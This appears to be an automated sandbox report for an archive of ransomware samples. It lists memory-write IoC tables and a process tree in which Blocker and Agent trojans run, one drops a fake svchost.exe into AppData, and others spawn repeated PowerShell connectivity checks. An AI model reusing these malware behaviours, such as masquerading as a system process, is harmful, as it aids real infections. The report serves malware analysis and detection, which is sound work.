1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
2728	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe
1176	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2728 wrote to memory of 1176	2728	taskmgr.exe	90
PID 2728 wrote to memory of 1176	2728	taskmgr.exe	90
PID 2636 wrote to memory of 912	2636	powershell.exe	98
PID 2636 wrote to memory of 912	2636	powershell.exe	98
PID 912 wrote to memory of 1288	912	cmd.exe	99
PID 912 wrote to memory of 1288	912	cmd.exe	99
PID 912 wrote to memory of 2440	912	cmd.exe	100
PID 912 wrote to memory of 2440	912	cmd.exe	100
PID 912 wrote to memory of 2440	912	cmd.exe	100
PID 912 wrote to memory of 4492	912	cmd.exe	101
PID 912 wrote to memory of 4492	912	cmd.exe	101
PID 912 wrote to memory of 4492	912	cmd.exe	101
PID 912 wrote to memory of 1888	912	cmd.exe	102
PID 912 wrote to memory of 1888	912	cmd.exe	102
PID 912 wrote to memory of 448	912	cmd.exe	103
PID 912 wrote to memory of 448	912	cmd.exe	103
PID 912 wrote to memory of 448	912	cmd.exe	103
PID 912 wrote to memory of 3268	912	cmd.exe	104
PID 912 wrote to memory of 3268	912	cmd.exe	104
PID 912 wrote to memory of 3268	912	cmd.exe	104
PID 912 wrote to memory of 740	912	cmd.exe	338
PID 912 wrote to memory of 740	912	cmd.exe	338
PID 912 wrote to memory of 4628	912	cmd.exe	106
PID 912 wrote to memory of 4628	912	cmd.exe	106
PID 912 wrote to memory of 4628	912	cmd.exe	106
PID 3268 wrote to memory of 5072	3268	HEUR-Trojan-Ransom.MSIL.Blocker.gen-b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823.exe	107
PID 3268 wrote to memory of 5072	3268	HEUR-Trojan-Ransom.MSIL.Blocker.gen-b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823.exe	107
PID 3268 wrote to memory of 5072	3268	HEUR-Trojan-Ransom.MSIL.Blocker.gen-b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823.exe	107
PID 912 wrote to memory of 2240	912	cmd.exe	109
PID 912 wrote to memory of 2240	912	cmd.exe	109
PID 912 wrote to memory of 2240	912	cmd.exe	109
PID 2440 wrote to memory of 1832	2440	HEUR-Trojan-Ransom.MSIL.Blocker.gen-04605e558a017e333a2dc6d15253bdd66f119e034bf81ebebdf796d101bdae24.exe	110
PID 2440 wrote to memory of 1832	2440	HEUR-Trojan-Ransom.MSIL.Blocker.gen-04605e558a017e333a2dc6d15253bdd66f119e034bf81ebebdf796d101bdae24.exe	110
PID 2440 wrote to memory of 1832	2440	HEUR-Trojan-Ransom.MSIL.Blocker.gen-04605e558a017e333a2dc6d15253bdd66f119e034bf81ebebdf796d101bdae24.exe	110
PID 4492 wrote to memory of 4452	4492	HEUR-Trojan-Ransom.MSIL.Blocker.gen-0581c8ded73ea315a40c7af2f865dc60e32e5db1afd1c515bc96de9048510139.exe	111
PID 4492 wrote to memory of 4452	4492	HEUR-Trojan-Ransom.MSIL.Blocker.gen-0581c8ded73ea315a40c7af2f865dc60e32e5db1afd1c515bc96de9048510139.exe	111
PID 4492 wrote to memory of 4452	4492	HEUR-Trojan-Ransom.MSIL.Blocker.gen-0581c8ded73ea315a40c7af2f865dc60e32e5db1afd1c515bc96de9048510139.exe	111
PID 912 wrote to memory of 1784	912	cmd.exe	115
PID 912 wrote to memory of 1784	912	cmd.exe	115
PID 912 wrote to memory of 1784	912	cmd.exe	115
PID 4628 wrote to memory of 2200	4628	HEUR-Trojan-Ransom.MSIL.Blocker.gen-cd9e4b887613e740b2a9a3c63033c9dea1fdbf325b5a194c111b93ab47db6e0d.exe	529
PID 4628 wrote to memory of 2200	4628	HEUR-Trojan-Ransom.MSIL.Blocker.gen-cd9e4b887613e740b2a9a3c63033c9dea1fdbf325b5a194c111b93ab47db6e0d.exe	529
PID 4628 wrote to memory of 2200	4628	HEUR-Trojan-Ransom.MSIL.Blocker.gen-cd9e4b887613e740b2a9a3c63033c9dea1fdbf325b5a194c111b93ab47db6e0d.exe	529
PID 3268 wrote to memory of 4692	3268	HEUR-Trojan-Ransom.MSIL.Blocker.gen-b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823.exe	120
PID 3268 wrote to memory of 4692	3268	HEUR-Trojan-Ransom.MSIL.Blocker.gen-b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823.exe	120
PID 3268 wrote to memory of 4692	3268	HEUR-Trojan-Ransom.MSIL.Blocker.gen-b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823.exe	120
PID 2440 wrote to memory of 2696	2440	HEUR-Trojan-Ransom.MSIL.Blocker.gen-04605e558a017e333a2dc6d15253bdd66f119e034bf81ebebdf796d101bdae24.exe	124
PID 2440 wrote to memory of 2696	2440	HEUR-Trojan-Ransom.MSIL.Blocker.gen-04605e558a017e333a2dc6d15253bdd66f119e034bf81ebebdf796d101bdae24.exe	124
PID 2440 wrote to memory of 2696	2440	HEUR-Trojan-Ransom.MSIL.Blocker.gen-04605e558a017e333a2dc6d15253bdd66f119e034bf81ebebdf796d101bdae24.exe	124
PID 2240 wrote to memory of 3940	2240	HEUR-Trojan-Ransom.MSIL.Blocker.gen-d30eebdcb0cbe603d6be3cd984c808f324bb2281d0c23fc0a4ee501937736660.exe	125
PID 2240 wrote to memory of 3940	2240	HEUR-Trojan-Ransom.MSIL.Blocker.gen-d30eebdcb0cbe603d6be3cd984c808f324bb2281d0c23fc0a4ee501937736660.exe	125
PID 2240 wrote to memory of 3940	2240	HEUR-Trojan-Ransom.MSIL.Blocker.gen-d30eebdcb0cbe603d6be3cd984c808f324bb2281d0c23fc0a4ee501937736660.exe	125
PID 4492 wrote to memory of 2596	4492	HEUR-Trojan-Ransom.MSIL.Blocker.gen-0581c8ded73ea315a40c7af2f865dc60e32e5db1afd1c515bc96de9048510139.exe	127
PID 4492 wrote to memory of 2596	4492	HEUR-Trojan-Ransom.MSIL.Blocker.gen-0581c8ded73ea315a40c7af2f865dc60e32e5db1afd1c515bc96de9048510139.exe	127
PID 4492 wrote to memory of 2596	4492	HEUR-Trojan-Ransom.MSIL.Blocker.gen-0581c8ded73ea315a40c7af2f865dc60e32e5db1afd1c515bc96de9048510139.exe	127
PID 912 wrote to memory of 892	912	cmd.exe	123
PID 912 wrote to memory of 892	912	cmd.exe	123
PID 4628 wrote to memory of 2724	4628	HEUR-Trojan-Ransom.MSIL.Blocker.gen-cd9e4b887613e740b2a9a3c63033c9dea1fdbf325b5a194c111b93ab47db6e0d.exe	130
PID 4628 wrote to memory of 2724	4628	HEUR-Trojan-Ransom.MSIL.Blocker.gen-cd9e4b887613e740b2a9a3c63033c9dea1fdbf325b5a194c111b93ab47db6e0d.exe	130
PID 4628 wrote to memory of 2724	4628	HEUR-Trojan-Ransom.MSIL.Blocker.gen-cd9e4b887613e740b2a9a3c63033c9dea1fdbf325b5a194c111b93ab47db6e0d.exe	130
PID 3268 wrote to memory of 4388	3268	HEUR-Trojan-Ransom.MSIL.Blocker.gen-b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823.exe	132
PID 3268 wrote to memory of 4388	3268	HEUR-Trojan-Ransom.MSIL.Blocker.gen-b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823.exe	132
PID 3268 wrote to memory of 4388	3268	HEUR-Trojan-Ransom.MSIL.Blocker.gen-b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823.exe	132
PID 912 wrote to memory of 2428	912	cmd.exe	134

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00451.7z"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3952

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2728
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /1
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2636
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:912
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.MSIL.Agent.gen-bee28de2d33aad555f317d2d0eab8761be2439d18784cc55eb43292fa887cbfd.exe
    HEUR-Trojan-Ransom.MSIL.Agent.gen-bee28de2d33aad555f317d2d0eab8761be2439d18784cc55eb43292fa887cbfd.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1288
  - - C:\Users\Admin\AppData\Roaming\svchost.exe
      "C:\Users\Admin\AppData\Roaming\svchost.exe"
      4⤵
      PID:8416
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.MSIL.Blocker.gen-04605e558a017e333a2dc6d15253bdd66f119e034bf81ebebdf796d101bdae24.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-04605e558a017e333a2dc6d15253bdd66f119e034bf81ebebdf796d101bdae24.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2440
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1832
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2696
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1544
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:5564
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:6088
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:6264
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:6880
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:7176
    - - C:\Windows\SysWOW64\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7176" "1908" "1844" "1912" "0" "0" "1916" "0" "0" "0" "0" "0"
        5⤵
        
        PID:6096
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:7748
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:8280
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:9168
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:9488
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9488 -s 2088
        5⤵
        Program crash
        
        PID:9548
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:8320
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:10268
    - - C:\Windows\SysWOW64\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "10268" "2160" "2128" "2164" "0" "0" "2168" "0" "0" "0" "0" "0"
        5⤵
        
        PID:11724
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:11204
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:7364
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:10932
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:8268
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:11188
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 11188 -s 1888
        5⤵
        Program crash
        
        PID:5920
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:6048
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:9504
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:6980
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:10908
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:9128
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:8296
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.MSIL.Blocker.gen-0581c8ded73ea315a40c7af2f865dc60e32e5db1afd1c515bc96de9048510139.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-0581c8ded73ea315a40c7af2f865dc60e32e5db1afd1c515bc96de9048510139.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4492
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4452
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2596
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:856
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:5572
    - - C:\Windows\SysWOW64\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5572" "2160" "2120" "2164" "0" "0" "2168" "0" "0" "0" "0" "0"
        5⤵
        
        PID:10280
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:6108
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 2028
        5⤵
        Program crash
        
        PID:9276
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:6412
    - - C:\Windows\SysWOW64\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6412" "1984" "1916" "1988" "0" "0" "1992" "0" "0" "0" "0" "0"
        5⤵
        
        PID:8628
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:7068
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:7664
    - - C:\Windows\SysWOW64\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7664" "2416" "2384" "2412" "0" "0" "2420" "0" "0" "0" "0" "0"
        5⤵
        
        PID:12144
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:6460
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:8588
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:9200
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:9480
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:8548
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:10356
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a2d294421b50fe8750ed5e2293f30c35428439e4906b0514f38a1d8eb65eca14.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-a2d294421b50fe8750ed5e2293f30c35428439e4906b0514f38a1d8eb65eca14.exe
    3⤵
    - Executes dropped EXE
    PID:1888
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.MSIL.Blocker.gen-b130bf99d6b2926e0aa3f60407454bd1ee4453307d547a6e836bf1a60206abf4.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-b130bf99d6b2926e0aa3f60407454bd1ee4453307d547a6e836bf1a60206abf4.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:448
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.MSIL.Blocker.gen-b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3268
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:5072
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4692
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4388
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      System Location Discovery: System Language Discovery
      PID:5292
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:5832
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:5468
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:6816
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:5504
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:8028
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:6748
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:8820
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:9128
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:9720
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:9264
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9264 -s 2028
        5⤵
        Program crash
        
        PID:7600
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:10628
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.MSIL.Blocker.gen-b8f13f96d6c3d5b7a23d389e518963367e460f754a433a0e5e8765d702a99416.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-b8f13f96d6c3d5b7a23d389e518963367e460f754a433a0e5e8765d702a99416.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:740
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.MSIL.Blocker.gen-cd9e4b887613e740b2a9a3c63033c9dea1fdbf325b5a194c111b93ab47db6e0d.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-cd9e4b887613e740b2a9a3c63033c9dea1fdbf325b5a194c111b93ab47db6e0d.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4628
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2200
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2724
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      System Location Discovery: System Language Discovery
      PID:5332
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:5848
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:6036
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:6824
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
